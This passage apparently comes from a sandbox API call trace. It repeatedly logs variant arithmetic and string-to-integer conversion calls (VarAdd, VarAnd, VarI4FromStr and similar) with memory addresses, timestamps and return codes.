pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.382] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.382] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.382] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.383] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.383] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.383] GetUserDefaultLCID () returned 0x409 [0069.383] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.383] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.383] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.383] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.383] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.384] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.384] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.384] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.384] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.384] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.384] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.384] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.384] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.384] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.384] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.384] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.384] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.384] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.384] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.384] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.384] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.384] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.384] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.385] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.385] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.385] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.385] GetUserDefaultLCID () returned 0x409 [0069.385] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.386] GetUserDefaultLCID () returned 0x409 [0069.386] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.386] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.386] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.386] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.386] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.386] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.386] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.386] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.386] GetUserDefaultLCID () returned 0x409 [0069.386] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.386] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.386] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.386] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.386] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.386] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.386] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.386] GetUserDefaultLCID () returned 0x409 [0069.386] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.386] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.386] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.386] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.386] GetUserDefaultLCID () returned 0x409 [0069.386] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.386] GetUserDefaultLCID () returned 0x409 [0069.386] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.387] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.387] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.387] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.388] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.388] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.388] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.388] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.388] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.388] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.388] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.388] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.388] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.388] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.388] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.388] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.388] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.388] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.388] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.388] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.388] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.388] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.389] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.389] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.389] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.390] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.390] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.390] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.390] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.390] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.390] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.390] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.390] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.390] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.390] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.390] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.390] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.390] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.390] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.390] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.390] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.390] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.390] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.390] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.390] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.390] GetUserDefaultLCID () returned 0x409 [0069.390] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.391] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.391] GetUserDefaultLCID () returned 0x409 [0069.391] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.392] GetUserDefaultLCID () returned 0x409 [0069.392] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.392] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.392] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.392] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.392] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.392] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.392] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.392] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.392] GetUserDefaultLCID () returned 0x409 [0069.392] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.392] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.392] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.392] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.392] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.392] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.392] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.392] GetUserDefaultLCID () returned 0x409 [0069.392] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.392] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.392] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.392] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.392] GetUserDefaultLCID () returned 0x409 [0069.392] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.392] GetUserDefaultLCID () returned 0x409 [0069.392] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: 